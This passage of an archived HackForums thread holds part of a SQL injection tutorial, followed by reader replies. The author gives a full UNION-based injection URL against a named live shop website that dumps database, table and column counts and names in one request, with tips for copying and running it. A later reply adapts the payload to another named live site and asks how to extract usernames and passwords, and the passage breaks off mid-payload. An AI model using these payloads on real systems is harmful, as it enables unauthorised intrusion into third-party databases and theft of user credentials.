(select(count(*))%0Afrom(information_schema.columns)where(table_name=@tbl))x)</code></div></div><br><span style="font-weight: bold;"><span style="color: #FFD700;">The final code will be:</span></span><br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #66CCFF">http</span><span style="color: #7AC07C">:</span><span style="color: #FFCCCC">//www.sonoshop.fr/pages/produit.php?id=55&nbsp;and&nbsp;0&nbsp;UNION&nbsp;SELECT&nbsp;1,2,3,4,5,6,7,8,9,concat(0x3c62723e,version(),0x203a3a20616a6b61726f,<br></span><span style="color: #66CCFF">0x3c62723e746f74616c206e756d626572206f66206461746162617365733a20</span><span style="color: #7AC07C">,(</span><span style="color: #66CCFF">select&nbsp;count</span><span style="color: #7AC07C">(*)&nbsp;%</span><span style="color: #66CCFF">0Afrom&nbsp;information_schema</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">schemata</span><span style="color: #7AC07C">),<br></span><span style="color: #66CCFF">0x3c62723e746f74616c206e756d626572206f66207461626c657320696e20646174616261736573
​2028776974686f757420696e666f726d6174696f6e5f736368656d61293a20</span><span style="color: #7AC07C">,(</span><span style="color: #66CCFF">select&nbsp;count</span><span style="color: #7AC07C">(*)&nbsp;%</span><span style="color: #66CCFF">0afrom&nbsp;information_schema</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">tables&nbsp;where&nbsp;table_schema</span><span style="color: #7AC07C">!=</span><span style="color: #66CCFF">0x696e666f726d6174696f6e5f736368656d61</span><span style="color: #7AC07C">),<br>(</span><span style="color: #66CCFF">select</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">)%</span><span style="color: #66CCFF">0afrom</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">),(</span><span style="color: #66CCFF">select</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">0</span><span style="color: #7AC07C">)%</span><span style="color: #66CCFF">0afrom</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">information_schema</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">tables</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">where</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">table_schema</span><span style="color: #7AC07C">!=</span><span style="color: #66CCFF">0x696e666f726d6174696f6e5f736368656d61</span><span style="color: #7AC07C">)and(</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">in<br></span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">concat</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">0x3c62723e</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">0x7461626c653a20</span><span style="color: #7AC07C">,@</span><span style="color: #66CCFF">tbl</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">table_name</span><span style="color: #7AC07C">,&nbsp;<br></span><span style="color: #66CCFF">0x202d2d3e20636f6c756d6e733a20</span><span style="color: #7AC07C">,&nbsp;(</span><span style="color: #66CCFF">select</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">count</span><span style="color: #7AC07C">(*))%</span><span style="color: #66CCFF">0Afrom</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">information_schema</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">columns</span><span style="color: #7AC07C">)<br></span><span style="color: #66CCFF">where</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">table_name</span><span style="color: #7AC07C">=@</span><span style="color: #66CCFF">tbl</span><span style="color: #7AC07C">))</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">)<br>),</span><span style="color: #66CCFF">11</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">12</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">13</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">14</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">15</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">16</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">17</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">18</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">19</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">20</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">21</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">22</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">23</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">24</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">25</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">26</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">27</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">28</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">29</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">30</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">31</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">32</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">33</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">34</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">35</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">36</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">37</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">38</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">39</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">40</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">41</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">42</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">43</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">44</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">45</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">46</span><span style="color: #7AC07C">--&nbsp;-&nbsp;<br></span></code></div></div></div><br><span style="color: #FF4500;"><span style="font-weight: bold;">Warning: </span></span>there is HF bug obviously, because it strips out some <span style="font-weight: bold;"><span style="color: #32CD32;">)</span></span> in syntax code. It should be <span style="color: #FFA500;"><span style="font-weight: bold;">6</span></span> <span style="font-weight: bold;"><span style="color: #32CD32;">)</span></span> after last <span style="color: #FFD700;">@tbl</span> at the end. But whatever I do some <span style="font-weight: bold;"><span style="color: #32CD32;">)</span></span> are cut off after I save text.<br><br>and result is:<br><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/4815721e9c7efa9a0c162b4e3e9e0221.jpg" alt="[Image: 4815721e9c7efa9a0c162b4e3e9e0221.jpg]" border="0"><br><br>If we play a little with <span style="color: #00BFFF;">html</span> (see my <a href="http://www.hackforums.net/showthread.php?tid=2798495" target="_blank"><span style="text-decoration: underline;">tutorial</span></a>) result can be nicer:<br><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/58d1864c1e7037a44c744e95090e09f1.jpg" alt="[Image: 58d1864c1e7037a44c744e95090e09f1.jpg]" border="0"><br><br><span style="color: #32CD32;">Challenge #46 is solved. </span><br><br>In <a href="http://www.hackforums.net/showthread.php?tid=3567217" target="_blank"><span style="text-decoration: underline;">next part #3</span></a>
 we will add counting records in each table to our command. Soon 
complete database/tables/columns/records statistics for every injection 
will be ready...<br><br>Thanks for reading <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/blackhat.gif" style="vertical-align: middle;" alt="Black Hat" title="Black Hat" border="0"><br><br><span style="color: #FF0000;"><span style="font-weight: bold;">WARNING</span></span><br>I hope you know about famous HF copy/paste problem with hidden characters. So my advice is: <span style="color: #FFD700;">open
 source of web page (click with right mouse button on page and select 
option View Page Source), locate command there and copy it from there. </span>In source code window those bug characters are visible in red color (see red rectangle on picture bellow).<br><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/1830dd08be981434974ae6a6ed35e4a4.jpg" alt="[Image: 1830dd08be981434974ae6a6ed35e4a4.jpg]" border="0"><br><span style="color: #32CD32;"><span style="font-weight: bold;">Delete them before running the command.</span></span></div><div class="post_meta" id="post_meta_33122849"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=949543" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3532481&amp;replyto=33122849" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid33129558" id="pid33129558"></a><table class="tborder" style="margin-top: 5px; " id="post_33129558" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">06-06-2013, 10:47 PM <span id="edited_by_33129558"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3532481&amp;pid=33129558#pid33129558">#2</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=72496"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/1667c96fb90d94769e72069d6cad71b6.png" alt="" height="80" width="80"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=72496"><span class="group0">133720</span></a></span></strong> <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Legion | Teacher | Pentester<br><span class="userstars"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/legion.gif" alt="Legion" title="Legion"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 134<br>Posts: 2,425<br>Joined: Jun 2009<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=72496"><strong class="reputation_positive">394</strong></a><br><span style="white-space:normal; width: 100%;"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_33129558">Thanks you so much ajkaro<br>Now i know this method..<br>Very Nice &amp; Great!</div><div class="post_meta" id="post_meta_33129558"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.cyberoot.com/" target="_blank" class="bitButton" rel="nofollow" title="Visit this user's website">WWW</a> <a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=72496" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3532481&amp;replyto=33129558" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid33135952" id="pid33135952"></a><table class="tborder" style="margin-top: 5px; " id="post_33135952" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">06-07-2013, 08:56 AM <span id="edited_by_33135952"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3532481&amp;pid=33135952#pid33135952">#3</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1829467"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/Y6MNVzr.png" alt="" height="86" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1829467"><span style="color:#383838">uzmire-</span></a></span></strong> <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Closed Account<br><span class="userstars"></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 1<br>Posts: 39<br>Joined: May 2013<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1829467"><strong class="reputation_positive">4</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_33135952">Great tutorial, thank you ajkaro for your tips!</div><div class="post_meta" id="post_meta_33135952"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1829467" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3532481&amp;replyto=33135952" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid33136697" id="pid33136697"></a><table class="tborder" style="margin-top: 5px; " id="post_33136697" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">06-07-2013, 09:48 AM <span id="edited_by_33136697"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3532481&amp;pid=33136697#pid33136697">#4</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1740097"><span class="group9">LiteKeys</span></a></span></strong> <a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1740097" title="Away"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/buddy_away.gif" alt="Away" border="0"></a><br><span class="smalltext">L33t Member<br><span class="userstars"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/starl33t.png" alt="*" border="0"><br></span><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/hf_l33t.png" alt="HF l33t" title="HF l33t"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 3<br>Posts: 49<br>Joined: Mar 2013<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1740097"><strong class="reputation_positive">11</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_33136697">Great Tutorial , thanks ajkaro , will start SQLi sooon.</div><div class="post_meta" id="post_meta_33136697"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://litekeys.de/" target="_blank" class="bitButton" rel="nofollow" title="Visit this user's website">WWW</a> <a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1740097" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3532481&amp;replyto=33136697" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid33150593" id="pid33150593"></a><table class="tborder" style="margin-top: 5px; " id="post_33150593" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">06-08-2013, 12:40 AM <span id="edited_by_33150593"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3532481&amp;pid=33150593#pid33150593">#5</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1457333"><span class="group2">kimsonha</span></a></span></strong> <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Harkonnen<br><span class="userstars"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 13<br>Posts: 169<br>Joined: Sep 2012<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1457333"><strong class="reputation_positive">10</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_33150593">Useful tutorial ajkaro,<br>Thank you for your tutorials.</div><div class="post_meta" id="post_meta_33150593"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1457333" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3532481&amp;replyto=33150593" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid33231909" id="pid33231909"></a><table class="tborder" style="margin-top: 5px; " id="post_33231909" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">06-11-2013, 02:47 PM <span id="edited_by_33231909"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3532481&amp;pid=33231909#pid33231909">#6</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/avatar_949543.png" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><span class="group29">ajkaro</span></a></span></strong> <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Ub3r Member<br><span class="userstars"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 133<br>Posts: 2,156<br>Joined: Aug 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=949543"><strong class="reputation_positive">194</strong></a><br><span style="white-space:normal; width: 100%;"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_33231909"><blockquote><cite><span>(06-06-2013 10:47 PM)</span>minkoko Wrote: <a href="http://www.hackforums.net/showthread.php?pid=33129558#pid33129558" class="quick_jump">►</a></cite>Thanks you so much ajkaro<br>Now i know this method..<br>Very Nice &amp; Great!</blockquote><br><blockquote><cite><span>(06-07-2013 08:56 AM)</span>uzmire- Wrote: <a href="http://www.hackforums.net/showthread.php?pid=33135952#pid33135952" class="quick_jump">►</a></cite>Great tutorial, thank you ajkaro for your tips!</blockquote><br><blockquote><cite><span>(06-07-2013 09:48 AM)</span>awesome12345 Wrote: <a href="http://www.hackforums.net/showthread.php?pid=33136697#pid33136697" class="quick_jump">►</a></cite>Great Tutorial , thanks ajkaro , will start SQLi sooon.</blockquote><br><blockquote><cite><span>(06-08-2013 12:40 AM)</span>kimsonha Wrote: <a href="http://www.hackforums.net/showthread.php?pid=33150593#pid33150593" class="quick_jump">►</a></cite>Useful tutorial ajkaro,<br>Thank you for your tutorials.</blockquote><br>Thanks for your feedback guys. I appreciate it...</div><div class="post_meta" id="post_meta_33231909"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=949543" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3532481&amp;replyto=33231909" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid33479476" id="pid33479476"></a><table class="tborder" style="margin-top: 5px; " id="post_33479476" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">06-23-2013, 07:55 AM <span id="edited_by_33479476"><span class="smalltext">(This post was last modified: 06-23-2013 07:57 AM by <a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1845525">ssomeone35</a>.)</span> </span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3532481&amp;pid=33479476#pid33479476">#7</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1845525"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/Cyan.png" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1845525"><span class="group2">ssomeone35</span></a></span></strong> <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Powindah<br><span class="userstars"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 1<br>Posts: 15<br>Joined: Jun 2013<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1845525"><strong class="reputation_positive">1</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_33479476">thanks,very useful :) u always give nice tutorials for nicer challenges <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/superman.gif" style="vertical-align: middle;" alt="Superman" title="Superman" border="0"></div><div class="post_meta" id="post_meta_33479476"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1845525" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3532481&amp;replyto=33479476" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid35576842" id="pid35576842"></a><table class="tborder" style="margin-top: 5px; " id="post_35576842" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">10-06-2013, 09:57 PM <span id="edited_by_35576842"><span class="smalltext">(This post was last modified: 10-06-2013 09:58 PM by <a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1985118">eagle360</a>.)</span> </span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3532481&amp;pid=35576842#pid35576842">#8</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1985118"><span class="group2">eagle360</span></a></span></strong> <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Powindah<br><span class="userstars"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 1<br>Posts: 17<br>Joined: Sep 2013<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1985118"><strong class="reputation_neutral">0</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_35576842">dear ajkaro：<br>i have a question !<br>after i got the table name how can i got the username or pass ?<br><br>one
 challenge in HF , i have tried this:http://www.blamm.com/top10.php?id=8
 and 0 UNION SELECT 1,2,3,(select (@x) from (select (@x:=0x00), 
(@running_number:=0),(select (0) from (information_schema.tables) where 
(table_schema=database()) and (0x00) in 
(@x:=concat(@x,0x3c62723e,@running_number:=@running_number%2b1,0x2e20,table_name
​))))x)<br>,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,
​33,34,35,36,37,38,39,40,41,42,43,44,45,46,47-- -<br><br>i just removed 
(information_schema.tables) where (table_schema=database()) and added 
users ,in the end ,i added some colunms like email and password<br><a href="http://www.blamm.com/top10.php?id=8" target="_blank">http://www.blamm.com/top10.php?id=8</a>
 and 0 UNION SELECT 1,2,3,(select (@x) from (select (@x:=0x00), 
(@running_number:=0),(select (0) from users and (0x00) in 
